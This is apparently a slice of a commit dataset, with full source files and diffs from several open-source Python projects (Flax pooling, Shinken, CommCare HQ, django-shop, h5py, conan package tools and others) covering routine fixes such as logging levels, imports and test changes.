self.tester.assertEqual('Action succeeded.', payload['message'])
self.tester.assertTrue('data' in payload)
if args[0] == self.action_trigger:
self.tester.assertEqual(payload['status'], 'succeeded')
self.tester.assertTrue('execution_id' in payload)
self.tester.assertTrue('start_timestamp' in payload)
self.tester.assertEqual('core.local', payload['action_name'])
self.tester.assertTrue('result' in payload)
self.tester.assertTrue('parameters' in payload)
except Exception:
self.tester.fail('Test failed')
def test_notify_triggers(self):
liveaction = LiveActionDB(action='core.local')
liveaction.description = ''
liveaction.status = 'succeeded'
liveaction.parameters = {}
on_success = NotificationSubSchema(message='Action succeeded.')
on_failure = NotificationSubSchema(message='Action failed.')
liveaction.notify = NotificationSchema(on_success=on_success,
on_failure=on_failure)
liveaction.start_timestamp = datetime.datetime.utcnow()
dispatcher = NotifierTestCase.MockDispatcher(self)
notifier = Notifier(None, [], trigger_dispatcher=dispatcher)
notifier.process(liveaction)
|
Python
| 0
|
@@ -3780,14 +3780,32 @@
ier(
-None,
+connection=None, queues=
%5B%5D,
|
cf35695481b703e49fbc00e286ef6380a8aec394
|
Remove invalid test
|
corehq/apps/notifications/tests/test_views.py
|
corehq/apps/notifications/tests/test_views.py
|
from unittest.mock import patch
from corehq.apps.accounting.models import Subscription
from corehq.apps.groups.models import Group
from ..views import NotificationsServiceRMIView
def test_should_hide_feature_notifs_for_pro_with_groups():
with case_sharing_groups_patch(['agroupid']):
hide = NotificationsServiceRMIView._should_hide_feature_notifs("test", "pro")
assert hide, "notifications should be hidden for pro domain with groups"
def test_should_hide_feature_notifs_for_pro_without_groups():
with case_sharing_groups_patch([]), active_service_type_patch("not_IMPLEMENTATION_or_SANDBOX"):
hide = NotificationsServiceRMIView._should_hide_feature_notifs("test", "pro")
assert not hide, "notifications should not be hidden for pro domain without groups"
def test_should_hide_feature_notifs_for_non_pro_with_groups():
with case_sharing_groups_patch(['agroupid']), active_service_type_patch("not_IMPLEMENTATION_or_SANDBOX"):
hide = NotificationsServiceRMIView._should_hide_feature_notifs("test", None)
assert not hide, "notifications should not be hidden for pro domain without groups"
def test_should_hide_feature_notifs_for_implementation_subscription():
with case_sharing_groups_patch([]), active_service_type_patch("IMPLEMENTATION"):
hide = NotificationsServiceRMIView._should_hide_feature_notifs("test", "pro")
assert hide, "notifications should be hidden for IMPLEMENTATION subscription"
def test_should_hide_feature_notifs_for_sandbox_subscription():
with case_sharing_groups_patch([]), active_service_type_patch("SANDBOX"):
hide = NotificationsServiceRMIView._should_hide_feature_notifs("test", "pro")
assert hide, "notifications should be hidden for SANDBOX subscription"
def test_should_hide_feature_notifs_bug():
with case_sharing_groups_patch([]), active_service_type_patch():
hide = NotificationsServiceRMIView._should_hide_feature_notifs("test", None)
assert not hide, "notifications should not be hidden for null subscription"
def active_service_type_patch(service_type=None):
def getter(domain):
return sub
sub = None if service_type is None else Subscription(service_type=service_type)
return patch.object(Subscription, "get_active_subscription_by_domain", getter)
def case_sharing_groups_patch(groups):
# patch because quickcache makes this hard to test
def getter(domain, wrap):
assert not wrap, "expected wrap to be false"
return groups
return patch.object(Group, "get_case_sharing_groups", getter)
|
Python
| 0
|
@@ -800,360 +800,8 @@
%22%0A%0A%0A
-def test_should_hide_feature_notifs_for_non_pro_with_groups():%0A with case_sharing_groups_patch(%5B'agroupid'%5D), active_service_type_patch(%22not_IMPLEMENTATION_or_SANDBOX%22):%0A hide = NotificationsServiceRMIView._should_hide_feature_notifs(%22test%22, None)%0A assert not hide, %22notifications should not be hidden for pro domain without groups%22%0A%0A%0A
def
|
a5bfcca31ea3d8ed1f55cee96b5652c789f6600e
|
Fix #1801: contact downtime log spam ...
|
shinken/contactdowntime.py
|
shinken/contactdowntime.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2014:
# Gabes Jean, naparuba@gmail.com
# Gerhard Lausser, Gerhard.Lausser@consol.de
# Gregory Starck, g.starck@gmail.com
# Hartmut Goebel, h.goebel@goebel-consult.de
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
import time
from shinken.log import logger
""" TODO: Add some comment about this class for the doc"""
class ContactDowntime:
id = 1
# Just to list the properties we will send as pickle
# so to others daemons, so all but NOT REF
properties = {
# 'activate_me': None,
# 'entry_time': None,
# 'fixed': None,
'start_time': None,
# 'duration': None,
# 'trigger_id': None,
'end_time': None,
# 'real_end_time': None,
'author': None,
'comment': None,
'is_in_effect': None,
# 'has_been_triggered': None,
'can_be_deleted': None,
}
# Schedule a contact downtime. It's far more easy than a host/service
# one because we got a beginning, and an end. That's all for running.
# got also an author and a comment for logging purpose.
def __init__(self, ref, start_time, end_time, author, comment):
self.id = self.__class__.id
self.__class__.id += 1
self.ref = ref # pointer to srv or host we are apply
self.start_time = start_time
self.end_time = end_time
self.author = author
self.comment = comment
self.is_in_effect = False
self.can_be_deleted = False
# self.add_automatic_comment()
# Check if we came into the activation of this downtime
def check_activation(self):
now = time.time()
was_is_in_effect = self.is_in_effect
self.is_in_effect = (self.start_time <= now <= self.end_time)
logger.info("CHECK ACTIVATION:%s", self.is_in_effect)
# Raise a log entry when we get in the downtime
if not was_is_in_effect and self.is_in_effect:
self.enter()
# Same for exit purpose
if was_is_in_effect and not self.is_in_effect:
self.exit()
def in_scheduled_downtime(self):
return self.is_in_effect
# The referenced host/service object enters now a (or another) scheduled
# downtime. Write a log message only if it was not already in a downtime
def enter(self):
self.ref.raise_enter_downtime_log_entry()
# The end of the downtime was reached.
def exit(self):
self.ref.raise_exit_downtime_log_entry()
self.can_be_deleted = True
# A scheduled downtime was prematurely canceled
def cancel(self):
self.is_in_effect = False
self.ref.raise_cancel_downtime_log_entry()
self.can_be_deleted = True
# Call by pickle to dataify the comment
# because we DO NOT WANT REF in this pickleisation!
def __getstate__(self):
# print "Asking a getstate for a downtime on", self.ref.get_dbg_name()
cls = self.__class__
# id is not in *_properties
res = [self.id]
for prop in cls.properties:
res.append(getattr(self, prop))
# We reverse because we want to recreate
# By check at properties in the same order
res.reverse()
return res
# Inverted function of getstate
def __setstate__(self, state):
cls = self.__class__
self.id = state.pop()
for prop in cls.properties:
val = state.pop()
setattr(self, prop, val)
if self.id >= cls.id:
cls.id = self.id + 1
|
Python
| 0
|
@@ -2500,12 +2500,13 @@
ger.
-info
+debug
(%22CH
|
b769c027b1db7a419f916e3961d0b746eef7c666
|
move import SimpleITK back into function
|
src/datareader.py
|
src/datareader.py
|
#! /usr/bin/python
# -*- coding: utf-8 -*-
""" Module for readin 3D dicom data
"""
# import funkcí z jiného adresáře
import sys
import os.path
path_to_script = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(path_to_script, "../extern/pyseg_base/src"))
sys.path.append(os.path.join(path_to_script,
"../extern/py3DSeedEditor/"))
#sys.path.append(os.path.join(path_to_script, "../extern/"))
#import featurevector
import logging
logger = logging.getLogger(__name__)
# -------------------- my scripts ------------
import dcmreaddata as dcmr
import SimpleITK as sitk
import numpy as np
class DataReader:
def __init__(self):
self.overlay_fcn = None
def Get3DData(self, datapath, qt_app=None,
dataplus_format=False, gui=False,
start=0, stop=None, step=1):
"""
:datapath directory with input data
:qt_app if it is set to None (as default) all dialogs for series
selection are performed in terminal. If qt_app is set to
QtGui.QApplication() dialogs are in Qt.
:dataplus_format is new data format. Metadata and data are returned in
one structure.
"""
if qt_app is None and gui is True:
from PyQt4.QtGui import QApplication
qt_app = QApplication(sys.argv)
datapath = os.path.normpath(datapath)
if os.path.isfile(datapath):
path, ext = os.path.splitext(datapath)
if ext in ('.pklz', '.pkl'):
import misc
data = misc.obj_from_file(datapath, filetype='pkl')
data3d = data.pop('data3d')
#metadata must have series_number
metadata = {
'series_number': 0,
'datadir': datapath
}
metadata.update(data)
else:
# reading raw file
image = sitk.ReadImage(datapath)
#image = sitk.ReadImage('/home/mjirik/data/medical/data_orig/sliver07/01/liver-orig001.mhd') #noqa
#sz = image.GetSize()
#data3d = sitk.Image(sz[0],sz[1],sz[2], sitk.sitkInt16)
#for i in range(0,sz[0]):
# print i
# for j in range(0,sz[1]):
# for k in range(0,sz[2]):
# data3d[i,j,k]=image[i,j,k]
data3d = sitk.GetArrayFromImage(image) # + 1024
#data3d = np.transpose(data3d)
#data3d = np.rollaxis(data3d,1)
metadata = {} # reader.get_metaData()
metadata['series_number'] = 0 # reader.series_number
metadata['datadir'] = datapath
spacing = image.GetSpacing()
metadata['voxelsize_mm'] = [
spacing[2],
spacing[0],
spacing[1],
]
else:
# checks if data is in DICOM format
dir_type = 'images'
if dcmr.is_dicom_dir(datapath):
dir_type = 'dicom'
if dir_type == 'dicom': #reading dicom
logger.debug('Dir - DICOM')
reader = dcmr.DicomReader(datapath, qt_app=None, gui=True)
data3d = reader.get_3Ddata(start, stop, step)
metadata = reader.get_metaData()
metadata['series_number'] = reader.series_number
metadata['datadir'] = datapath
self.overlay_fcn = reader.get_overlay
else: # reading image sequence
logger.debug('Dir - Image sequence')
logger.debug('Getting list of readable files...')
flist = []
for f in os.listdir(datapath):
try:
sitk.ReadImage(os.path.join(datapath,f))
except:
logger.warning("Cant load file: "+str(f))
continue
flist.append(os.path.join(datapath,f))
flist.sort()
logger.debug('Reading image data...')
image = sitk.ReadImage(flist)
logger.debug('Getting numpy array from image data...')
data3d = sitk.GetArrayFromImage(image)
metadata = {} # reader.get_metaData()
metadata['series_number'] = 0 # reader.series_number
metadata['datadir'] = datapath
spacing = image.GetSpacing()
metadata['voxelsize_mm'] = [
spacing[2],
spacing[0],
spacing[1],
]
if dataplus_format:
logger.debug('dataplus format')
datap = metadata
datap['data3d'] = data3d
logger.debug('datap keys () : ' + str(datap.keys()))
return datap
else:
return data3d, metadata
def GetOverlay(self):
""" Generates dictionary of ovelays
"""
if self.overlay_fcn == None: # noqa
return {}
else:
return self.overlay_fcn()
def get_datapath_qt(qt_app):
# just call function from dcmr
return dcmr.get_datapath_qt(qt_app)
|
Python
| 0
|
@@ -593,33 +593,8 @@
mr%0A%0A
-import SimpleITK as sitk%0A
impo
@@ -1895,16 +1895,57 @@
aw file%0A
+ import SimpleITK as sitk%0A
|
9df00bbfa829006396c2a6718e4540410b27c4c6
|
Clear the job queue upon kolibri initialization.
|
kolibri/tasks/apps.py
|
kolibri/tasks/apps.py
|
from __future__ import absolute_import, print_function, unicode_literals
from django.apps import AppConfig
class KolibriTasksConfig(AppConfig):
name = 'kolibri.tasks'
label = 'kolibritasks'
verbose_name = 'Kolibri Tasks'
def ready(self):
pass
|
Python
| 0
|
@@ -263,9 +263,74 @@
-pass
+from kolibri.tasks.api import client%0A client.clear(force=True)
%0A
|
6a6cb75ad2c29435d74768aa88c5d925570a6ad0
|
Add some meta
|
flask_environments.py
|
flask_environments.py
|
import os
import yaml
from flask import current_app
class Environments(object):
def __init__(self, app=None, var_name=None, default_env=None):
self.app = app
self.var_name = var_name or 'FLASK_ENV'
self.default_env = default_env or 'DEVELOPMENT'
self.env = os.environ.get(self.var_name, self.default_env)
if app is not None:
self.init_app(app)
def init_app(self, app):
app.config['ENVIORNMENT'] = self.env
if app.extensions is None:
app.extensions = {}
app.extensions['environments'] = self
def get_app(self, reference_app=None):
if reference_app is not None:
return reference_app
if self.app is not None:
return self.app
return current_app
def from_object(self, config_obj):
app = self.get_app()
for name in self._possible_names():
try:
obj = '%s.%s' % (config_obj, name)
app.config.from_object(obj)
return
except:
pass
app.config.from_object(config_obj)
def from_yaml(self, path):
with open(path) as f:
c = yaml.load(f)
for name in self._possible_names():
try:
c = c[name]
except:
pass
app = self.get_app()
for key in c.iterkeys():
if key.isupper():
app.config[key] = c[key]
def _possible_names(self):
return (self.env, self.env.capitalize(), self.env.lower())
|
Python
| 0.000134
|
@@ -1,16 +1,249 @@
+# -*- coding: utf-8 -*-%0A%22%22%22%0A flask_environments%0A ~~~~~~~~~~~~~~~~~~%0A%0A Environment tools and configuration for Flask applications%0A%0A :copyright: (c) 2012 by Matt Wright.%0A :license: MIT, see LICENSE for more details.%0A%22%22%22%0A
%0Aimport os%0A%0Aimpo
|
cff83c316663975af2e838cbd8c365a68079c369
|
In plugin child_plugin_instances may be None
|
shop/cascade/extensions.py
|
shop/cascade/extensions.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from cms.plugin_pool import plugin_pool
from cmsplugin_cascade.plugin_base import TransparentContainer
from .plugin_base import ShopPluginBase
class ShopExtendableMixin(object):
"""
Add this mixin class to the list of ``model_mixins``, in the plugin class wishing to use extensions.
"""
@property
def left_extension(self):
result = [cp for cp in self.child_plugin_instances if cp.plugin_type == 'ShopLeftExtension']
if result:
return result[0]
@property
def right_extension(self):
result = [cp for cp in self.child_plugin_instances if cp.plugin_type == 'ShopRightExtension']
if result:
return result[0]
class LeftRightExtensionMixin(object):
"""
Plugin classes wishing to use extensions shall inherit from this class.
"""
@classmethod
def get_child_classes(cls, slot, page, instance=None):
child_classes = ['ShopLeftExtension', 'ShopRightExtension', None]
# allow only one left and one right extension
for child in instance.get_children():
child_classes.remove(child.plugin_type)
return child_classes
class ShopLeftExtension(TransparentContainer, ShopPluginBase):
name = _("Left Extension")
require_parent = True
parent_classes = ('ShopCartPlugin', 'ShopOrderViewsPlugin')
allow_children = True
render_template = 'cascade/generic/naked.html'
plugin_pool.register_plugin(ShopLeftExtension)
class ShopRightExtension(TransparentContainer, ShopPluginBase):
name = _("Right Extension")
require_parent = True
parent_classes = ('ShopCartPlugin', 'ShopOrderViewsPlugin')
allow_children = True
render_template = 'cascade/generic/naked.html'
plugin_pool.register_plugin(ShopRightExtension)
|
Python
| 0.999998
|
@@ -452,32 +452,99 @@
xtension(self):%0A
+ if self.child_plugin_instances is None:%0A return%0A
result =
@@ -714,32 +714,99 @@
xtension(self):%0A
+ if self.child_plugin_instances is None:%0A return%0A
result =
|
77e5dcc8592686202045a79cea293af602ed5d49
|
delete is trickle-down, so I think this is more precise
|
corehq/apps/reminders/tests/test_recipient.py
|
corehq/apps/reminders/tests/test_recipient.py
|
from django.test import TestCase
from corehq.apps.domain.models import Domain
from corehq.apps.locations.models import SQLLocation, LocationType
from corehq.apps.reminders.models import CaseReminder, CaseReminderHandler
from corehq.apps.users.models import CommCareUser
from corehq.form_processor.tests.utils import run_with_all_backends
from corehq.util.test_utils import create_test_case
from mock import patch
class ReminderRecipientTest(TestCase):
domain = 'reminder-recipient-test'
def setUp(self):
self.domain_obj = Domain(name=self.domain)
self.domain_obj.save()
self.parent_location_type = LocationType.objects.create(
domain=self.domain,
name='parent type',
code='parent'
)
self.child_location_type = LocationType.objects.create(
domain=self.domain,
name='child type',
code='child',
parent_type=self.parent_location_type
)
self.user = CommCareUser.create(self.domain, 'test', 'test')
def tearDown(self):
self.parent_location_type.delete()
self.child_location_type.delete()
self.user.delete()
self.domain_obj.delete()
@run_with_all_backends
def test_recipient_case_owner_location_parent(self):
parent_location = SQLLocation.objects.create(
domain=self.domain,
name='parent test',
site_code='parent',
location_type=self.parent_location_type
)
child_location = SQLLocation.objects.create(
domain=self.domain,
name='child test',
site_code='child',
location_type=self.child_location_type,
parent=parent_location
)
self.user.set_location(child_location)
with create_test_case(self.domain, 'test-case', 'test-name', owner_id=self.user.get_id) as case:
self.assertEqual(case.owner_id, self.user.get_id)
handler = CaseReminderHandler(domain=self.domain, recipient='CASE_OWNER_LOCATION_PARENT')
reminder = CaseReminder(domain=self.domain, case_id=case.case_id)
# Test the recipient is returned correctly
with patch('corehq.apps.reminders.models.CaseReminder.handler', new=handler):
self.assertEqual(reminder.recipient, [parent_location])
# Remove parent location
parent_location.delete()
child_location.parent = None
child_location.save()
with patch('corehq.apps.reminders.models.CaseReminder.handler', new=handler):
self.assertIsNone(reminder.recipient)
# Remove child location
self.user = CommCareUser.get(self.user._id)
self.user.unset_location()
child_location.delete()
with patch('corehq.apps.reminders.models.CaseReminder.handler', new=handler):
self.assertIsNone(reminder.recipient)
# Remove case
reminder.case_id = None
with patch('corehq.apps.reminders.models.CaseReminder.handler', new=handler):
self.assertIsNone(reminder.recipient)
|
Python
| 0.000012
|
@@ -2408,45 +2408,8 @@
ion%0A
- parent_location.delete()%0A
@@ -2475,24 +2475,61 @@
tion.save()%0A
+ parent_location.delete()%0A
@@ -2701,64 +2701,8 @@
ion%0A
- self.user = CommCareUser.get(self.user._id)%0A
|
bb5cbae79ef8efb8d0b7dd3ee95e76955317d3d7
|
Fix for broken container security test
|
tests/integration/api/test_sc_test_jobs.py
|
tests/integration/api/test_sc_test_jobs.py
|
from tests.base import BaseTest
from tenable_io.api.models import ScTestJob
class TestScTestJobsApi(BaseTest):
def test_status(self, client, image):
jobs = client.sc_test_jobs_api.list()
assert len(jobs) > 0, u'At least one job exists.'
test_job = client.sc_test_jobs_api.status(jobs[0].job_id)
assert isinstance(test_job, ScTestJob), u'The method returns type.'
def test_by_image(self, client, image):
job = client.sc_test_jobs_api.by_image(image['id'])
assert isinstance(job, ScTestJob), u'The method returns type.'
def test_by_image_digest(self, client, image):
job = client.sc_test_jobs_api.by_image(image['digest'])
assert isinstance(job, ScTestJob), u'The method returns type.'
def test_list(self, client, image):
jobs = client.sc_test_jobs_api.list()
assert len(jobs) > 0, u'At least one job exists.'
assert isinstance(jobs[0], ScTestJob), u'The method returns job list.'
|
Python
| 0
|
@@ -662,32 +662,39 @@
obs_api.by_image
+_digest
(image%5B'digest'%5D
|
db6e23671a82a76afc13b4a69422a6b0d3c381df
|
Rearrange tests
|
h5py/tests/high/test_hlobject.py
|
h5py/tests/high/test_hlobject.py
|
from tempfile import mktemp
from h5py import tests
import h5py
class Base(tests.HTest):
def setUp(self):
self.name = mktemp()
self.f = h5py.File(self.name, 'w')
def tearDown(self):
import os
try:
if self.f:
self.f.close()
finally:
if self.name and os.path.exists(self.name):
os.unlink(self.name)
class TestComparison(Base):
def test_eq(self):
""" (HLObject) __eq__ and __ne__ are opposite (files and groups) """
g1 = self.f.create_group('a')
g2 = self.f['a']
g3 = self.f.create_group('b')
f1 = self.f
f2 = g1.file
self.assert_(g1 == g2)
self.assert_(not g1 != g2)
self.assert_(g1 != g3)
self.assert_(not g1 == g3)
self.assert_(f1 == f2)
self.assert_(not f1 != f2)
def test_grp(self):
""" (HLObject) File objects don't compare equal to root group """
g = self.f['/']
self.assert_(not g == self.f)
self.assert_(g != self.f)
class TestPropFile(Base):
def test_file2(self):
""" (HLObject) .file property on subclasses """
g = self.f.create_group('foo')
g2 = self.f.create_group('foo/bar')
self.assertEqual(self.f, self.f.file)
self.assertEqual(self.f, g.file)
self.assertEqual(self.f, g2.file)
class TestProps(Base):
@tests.require(api=18)
def test_lcpl(self):
""" (HLObject) lcpl """
lcpl = self.f._lcpl
self.assertIsInstance(lcpl, h5py.h5p.PropLCID)
@tests.require(api=18)
def test_lapl(self):
""" (HLObject) lapl """
lapl = self.f._lapl
self.assertIsInstance(lapl, h5py.h5p.PropLAID)
class TestParent(Base):
def test_parent(self):
""" (HLObject) .parent """
self.assertEqual(self.f.parent, self.f['/'])
g = self.f.create_group('a')
g2 = self.f.create_group('a/b')
self.assertEqual(g2.parent, g)
self.assertEqual(g.parent, self.f['/'])
|
Python
| 0.000015
|
@@ -1085,20 +1085,17 @@
TestProp
-File
+s
(Base):%0A
@@ -1154,31 +1154,8 @@
ile
-property on subclasses
%22%22%22%0A
@@ -1363,24 +1363,304 @@
, g2.file)%0A%0A
+ def test_parent(self):%0A %22%22%22 (HLObject) .parent %22%22%22%0A self.assertEqual(self.f.parent, self.f%5B'/'%5D)%0A g = self.f.create_group('a')%0A g2 = self.f.create_group('a/b')%0A self.assertEqual(g2.parent, g)%0A self.assertEqual(g.parent, self.f%5B'/'%5D)%0A%0A
class TestPr
@@ -2011,311 +2011,8 @@
D)%0A%0A
-class TestParent(Base):%0A%0A def test_parent(self):%0A %22%22%22 (HLObject) .parent %22%22%22%0A self.assertEqual(self.f.parent, self.f%5B'/'%5D)%0A g = self.f.create_group('a')%0A g2 = self.f.create_group('a/b')%0A self.assertEqual(g2.parent, g)%0A self.assertEqual(g.parent, self.f%5B'/'%5D)
%0A%0A%0A%0A
|
6594bb843998ee22b0a12036a0e16c1fd625fd03
|
Revert "Catch Validation error"
|
shop/context_processors.py
|
shop/context_processors.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.forms.utils import ValidationError
from shop.models.customer import CustomerModel
def customer(request):
"""
Add the customer to the RequestContext
"""
msg = "The request object does not contain a customer. Edit your MIDDLEWARE_CLASSES setting to insert 'shop.middlerware.CustomerMiddleware'."
assert hasattr(request, 'customer'), msg
context = {
'customer': request.customer,
'site_header': settings.SHOP_APP_LABEL.capitalize(),
}
if request.user.is_staff:
try:
context.update(customer=CustomerModel.objects.get(pk=request.session['emulate_user_id']))
except (CustomerModel.DoesNotExist, KeyError, AttributeError, ValidationError):
pass
return context
|
Python
| 0
|
@@ -57,17 +57,16 @@
iterals%0A
-%0A
from dja
@@ -94,55 +94,8 @@
ngs%0A
-from django.forms.utils import ValidationError%0A
from
@@ -751,25 +751,8 @@
rror
-, ValidationError
):%0A
|
ff97879ca25eb1e9e4a90308236e367354900da8
|
Add count_include_pad argument to flax.linen.pooling.avg_pool
|
flax/linen/pooling.py
|
flax/linen/pooling.py
|
# Copyright 2022 The Flax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pooling modules."""
from jax import lax
import jax.numpy as jnp
import numpy as np
def pool(inputs, init, reduce_fn, window_shape, strides, padding):
"""Helper function to define pooling functions.
Pooling functions are implemented using the ReduceWindow XLA op.
NOTE: Be aware that pooling is not generally differentiable.
That means providing a reduce_fn that is differentiable does not imply that
pool is differentiable.
Args:
inputs: input data with dimensions (batch, window dims..., features).
init: the initial value for the reduction
reduce_fn: a reduce function of the form `(T, T) -> T`.
window_shape: a shape tuple defining the window to reduce over.
strides: a sequence of `n` integers, representing the inter-window
strides (default: `(1, ..., 1)`).
padding: either the string `'SAME'`, the string `'VALID'`, or a sequence
of `n` `(low, high)` integer pairs that give the padding to apply before
and after each spatial dimension.
Returns:
The output of the reduction for each window slice.
"""
strides = strides or (1,) * len(window_shape)
assert len(window_shape) == len(strides), (
f"len({window_shape}) must equal len({strides})")
strides = (1,) + strides + (1,)
dims = (1,) + window_shape + (1,)
is_single_input = False
if inputs.ndim == len(dims) - 1:
# add singleton batch dimension because lax.reduce_window always
# needs a batch dimension.
inputs = inputs[None]
is_single_input = True
assert inputs.ndim == len(dims), f"len({inputs.shape}) != len({dims})"
if not isinstance(padding, str):
padding = tuple(map(tuple, padding))
assert len(padding) == len(window_shape), (
f"padding {padding} must specify pads for same number of dims as "
f"window_shape {window_shape}")
assert all([len(x) == 2 for x in padding]), (
f"each entry in padding {padding} must be length 2")
padding = ((0, 0),) + padding + ((0, 0),)
y = lax.reduce_window(inputs, init, reduce_fn, dims, strides, padding)
if is_single_input:
y = jnp.squeeze(y, axis=0)
return y
def avg_pool(inputs, window_shape, strides=None, padding="VALID", count_include_pad=True):
"""Pools the input by taking the average over a window.
Args:
inputs: input data with dimensions (batch, window dims..., features).
window_shape: a shape tuple defining the window to reduce over.
strides: a sequence of `n` integers, representing the inter-window
strides (default: `(1, ..., 1)`).
padding: either the string `'SAME'`, the string `'VALID'`, or a sequence
of `n` `(low, high)` integer pairs that give the padding to apply before
and after each spatial dimension (default: `'VALID'`).
count_include_pad: ...
Returns:
The average for each window slice.
"""
y = pool(inputs, 0., lax.add, window_shape, strides, padding)
if count_include_pad:
y = y / np.prod(window_shape)
else:
div_shape = (1,) + inputs.shape[1:-1] + (1,)
y = y / pool(jnp.ones(div_shape), 0., lax.add, window_shape, strides, padding)
return y
def max_pool(inputs, window_shape, strides=None, padding="VALID"):
"""Pools the input by taking the maximum of a window slice.
Args:
inputs: input data with dimensions (batch, window dims..., features).
window_shape: a shape tuple defining the window to reduce over.
strides: a sequence of `n` integers, representing the inter-window
strides (default: `(1, ..., 1)`).
padding: either the string `'SAME'`, the string `'VALID'`, or a sequence
of `n` `(low, high)` integer pairs that give the padding to apply before
and after each spatial dimension (default: `'VALID'`).
Returns:
The maximum for each window slice.
"""
y = pool(inputs, -jnp.inf, lax.max, window_shape, strides, padding)
return y
def min_pool(inputs, window_shape, strides=None, padding="VALID"):
"""Pools the input by taking the minimum of a window slice.
Args:
inputs: Input data with dimensions (batch, window dims..., features).
window_shape: A shape tuple defining the window to reduce over.
strides: A sequence of `n` integers, representing the inter-window strides
(default: `(1, ..., 1)`).
padding: Either the string `'SAME'`, the string `'VALID'`, or a sequence of
`n` `(low, high)` integer pairs that give the padding to apply before and
after each spatial dimension (default: `'VALID'`).
Returns:
The minimum for each window slice.
"""
return pool(inputs, jnp.inf, lax.min, window_shape, strides, padding)
|
Python
| 0.000012
|
@@ -3348,18 +3348,109 @@
de_pad:
-..
+a boolean whether to include padded tokens%0A in the average calculation (default: %60True%60)
.%0A Retu
|
e0b90786a815fdc154aecc1057485e712a6286ad
|
use assertRegexpMatches instead of assertRegex to support python 2.7
|
cpt/test/integration/update_some_deps_test.py
|
cpt/test/integration/update_some_deps_test.py
|
import unittest
from conans.client.tools import environment_append
from conans.test.utils.tools import TestClient, TestServer
from cpt.test.unit.utils import MockCIManager
from cpt.test.test_client.tools import get_patched_multipackager
class UpdateTest(unittest.TestCase):
conanfile_bar = """from conans import ConanFile
class Pkg(ConanFile):
name = "bar"
version = "0.1.0"
def build(self):
pass
"""
conanfile_foo = """from conans import ConanFile
class Pkg(ConanFile):
name = "foo"
version = "1.0.0"
options = {"shared": [True, False]}
default_options = "shared=True"
def build(self):
pass
"""
conanfile_foo_2 = """from conans import ConanFile
class Pkg(ConanFile):
name = "foo"
version = "1.0.0"
options = {"shared": [True, False]}
default_options = "shared=False"
def build(self):
self.output.info("new foo")
"""
conanfile_foo_3 = """from conans import ConanFile
class Pkg(ConanFile):
name = "qux"
version = "1.0.0"
options = {"shared": [True, False]}
default_options = "shared=False"
def build(self):
self.output.info("qux")
"""
conanfile = """from conans import ConanFile
class Pkg(ConanFile):
name = "foobar"
version = "2.0"
requires = "bar/0.1.0@foo/stable", "foo/1.0.0@bar/testing", "qux/1.0.0@qux/stable"
def build(self):
self.output.warn("BUILDING")
"""
def setUp(self):
self._ci_manager = MockCIManager()
self._server = TestServer(users={"user": "password"},
write_permissions=[("bar/0.1.0@foo/stable", "user"),
("foo/1.0.0@bar/testing", "user"),
("qux/1.0.0@qux/stable", "user")])
self._client = TestClient(servers={"default": self._server},
users={"default": [("user", "password")]})
self._client.save({"conanfile_bar.py": self.conanfile_bar})
self._client.run("export conanfile_bar.py foo/stable")
self._client.save({"conanfile_foo.py": self.conanfile_foo})
self._client.run("export conanfile_foo.py bar/testing")
self._client.save({"conanfile_foo3.py": self.conanfile_foo_3})
self._client.run("export conanfile_foo3.py qux/stable")
self._client.save({"conanfile.py": self.conanfile})
def test_update_some_dependencies(self):
with environment_append({"CONAN_UPLOAD": self._server.fake_url,
"CONAN_LOGIN_USERNAME": "user",
"CONAN_PASSWORD": "password", "CONAN_USERNAME": "user",
"CONAN_UPLOAD_DEPENDENCIES": "all",
"CONAN_UPDATE_DEPENDENCIES": "True"}):
mulitpackager = get_patched_multipackager(self._client, username="user",
channel="testing",
build_policy=["foobar", "bar", "foo", "qux"],
exclude_vcvars_precommand=True,
ci_manager=self._ci_manager)
mulitpackager.add({}, {})
mulitpackager.run()
self.assertIn("Uploading packages for 'foobar/2.0@user/testing'", self._client.out)
self.assertIn("Uploading packages for 'bar/0.1.0@foo/stable'", self._client.out)
self.assertIn("Uploading packages for 'foo/1.0.0@bar/testing'", self._client.out)
self.assertIn("Uploading packages for 'qux/1.0.0@qux/stable'", self._client.out)
# only build and upload foobar
mulitpackager = get_patched_multipackager(self._client, username="user",
channel="testing",
build_policy="foobar",
exclude_vcvars_precommand=True,
ci_manager=self._ci_manager,
conanfile="conanfile.py")
mulitpackager.add({}, {})
mulitpackager.run()
self.assertRegex(str(self._client.out), r'bar/0.1.0@foo/stable:.* - Cache')
self.assertRegex(str(self._client.out), r'foo/1.0.0@bar/testing:.* - Cache')
self.assertRegex(str(self._client.out), r'qux/1.0.0@qux/stable:.* - Cache')
self.assertRegex(str(self._client.out), r'foobar/2.0@user/testing:.* - Build')
self.assertIn("Uploading packages for 'foobar/2.0@user/testing'", self._client.out)
self.assertNotIn("Uploading packages for 'bar/0.1.0@foo/stable'", self._client.out)
self.assertNotIn("Uploading packages for 'foo/1.0.0@bar/testing'", self._client.out)
self.assertNotIn("Uploading packages for 'qux/1.0.0@qux/stable'", self._client.out)
|
Python
| 0
|
@@ -4337,32 +4337,40 @@
self.assertRegex
+pMatches
(str(self._clien
@@ -4433,32 +4433,40 @@
self.assertRegex
+pMatches
(str(self._clien
@@ -4530,32 +4530,40 @@
self.assertRegex
+pMatches
(str(self._clien
@@ -4635,16 +4635,24 @@
ertRegex
+pMatches
(str(sel
|
80caa173028e0252a6e51e57b6cb9c423df6ad59
|
Access type name via __name__.
|
